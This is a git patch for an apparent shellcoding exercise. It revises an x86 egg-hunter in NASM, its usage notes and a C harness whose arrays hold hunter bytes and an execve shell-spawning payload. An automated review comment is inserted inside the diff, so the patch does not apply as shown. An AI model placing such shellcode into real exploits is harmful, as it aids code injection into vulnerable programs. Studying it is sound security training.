From abf6ca0fe767c324e9fc29b261d63ae3c01a4a54 Mon Sep 17 00:00:00 2001
From: arno01
Date: Wed, 27 Mar 2013 17:02:50 +0100
Subject: [PATCH] minor updates

---
 exam3/USAGE | 11 +++++------
 exam3/hunter.nasm | 8 --------
 exam3/shellcode.c | 4 ++--
 3 files changed, 7 insertions(+), 16 deletions(-)

diff --git a/exam3/USAGE b/exam3/USAGE
index e04c367..e2492b0 100644
--- a/exam3/USAGE
+++ b/exam3/USAGE
@@ -10,8 +10,8 @@ exam3$ ln -svf payload-execve-stack.nasm payload.nasm
 2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
-exam3$ ./make.sh "egg.mark"
- [I] Using custom EGG mark: egg.mark
+exam3$ ./make.sh "egg.MaRk"
+ [I] Using custom EGG mark: egg.MaRk
 [+] Compiling payload.nasm ...
 [+] Compiling hunter.nasm ...
 [+] Extracting PAYLOAD code from payload ...
@@ -20,14 +20,13 @@ exam3$ ./make.sh "egg.mark"
 [+] Extracting HUNTER code from hunter ...
 [+] Checking HUNTER code for NULLs ...
 [+] Compiling shellcode.c ...
--rwx------. 1 arno arno 5100 Mar 27 16:47 ./shellcode
+-rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode
 [+] All done!
 3. Run the shellcode
 exam3$ ./shellcode
-Hunter Length: 29
+Hunter Length: 21
 Payload Length: 36
-sh-4.1$ exit
-
+sh-4.1$
diff --git a/exam3/hunter.nasm b/exam3/hunter.nasm
index 3e16d88..da46f05 100644
--- a/exam3/hunter.nasm
+++ b/exam3/hunter.nasm
@@ -28,11 +28,6 @@ global _start
 _start:
- jmp short huntersEnd
-
-continue:
- pop eax ; Now EAX points at hunters End
-
 ; Searching for the Egg marker
 next:
 inc eax ; Searching forward (can also try dec eax)
@@ -43,6 +38,3 @@ isEgg:
 jne next
 call eax ; Once found, we call our payload
-
-huntersEnd:
- call continue
diff --git a/exam3/shellcode.c b/exam3/shellcode.c
index daeff45..feaf2d7 100644
--- a/exam3/shellcode.c
+++ b/exam3/shellcode.c
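Review bot: With the jmp/call/pop prologue dropped in the first hunter.nasm hunk, `_start` now falls straight into `next: inc eax`, so the scan starts from whatever EAX holds at entry instead of from the hunter's own end address, and nothing in the hunk establishes that value. If the harness in shellcode.c (which enters the hunter from C) is being relied on to leave a usable address in EAX, that is an unstated precondition that belongs in the source — e.g. `; Precondition: EAX holds the scan start address at entry (caller-dependent; formerly set by pop eax)` placed above `next:`. The removal of `huntersEnd:` / `call continue` in the second hunk is the matching half of the same change, and the 29→21 byte drop recorded in USAGE is consistent with it. `_start` continues past both hunks.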
@@ -1,11 +1,11 @@
 #include
 #include
-unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x6d\x61\x72\x6b\x75\xed\xff\xd0\xe8\xe5\xff\xff\xff";
+unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
 unsigned char garbage1[] = "Just some garbage here...";
-unsigned char payload[] = "\x65\x67\x67\x2e\x6d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
 unsigned char garbage2[] = "And some garbage there...";